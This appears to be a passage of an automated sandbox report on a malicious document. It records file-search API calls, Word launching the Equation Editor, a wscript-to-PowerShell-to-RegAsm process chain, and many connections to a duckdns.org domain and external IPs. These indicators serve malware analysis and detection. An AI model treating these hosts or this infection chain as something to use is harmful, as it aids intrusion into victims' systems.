            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_100010F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10006580 FindFirstFileExA,8_2_10006580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407C97
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

            Software Vulnerabilities

            barindex
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global trafficDNS query: name: iwarsut775laudrye2.duckdns.org
            Source: global trafficDNS query: name: iwarsut775laudrye2.duckdns.org
            Source: global trafficDNS query: name: iwarsut775laudrye2.duckdns.org
            Source: global trafficDNS query: name: iwarsut775laudrye2.duckdns.org
            Source: global trafficDNS query: name: iwarsut775laudrye2.duckdns.org
            Source: global trafficDNS query: name: iwarsut775laudrye2.duckdns.org
            Source: global trafficDNS query: name: geoplugin.net
            Source: global trafficDNS query: name: asociatiatraditiimaria.ro
            Source: global trafficDNS query: name: new.quranushaiqer.org.sa
            Source: global trafficDNS query: name: new.quranushaiqer.org.sa
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.176.133:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 178.237.33.50:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.113.54.56:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 34.166.62.190:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
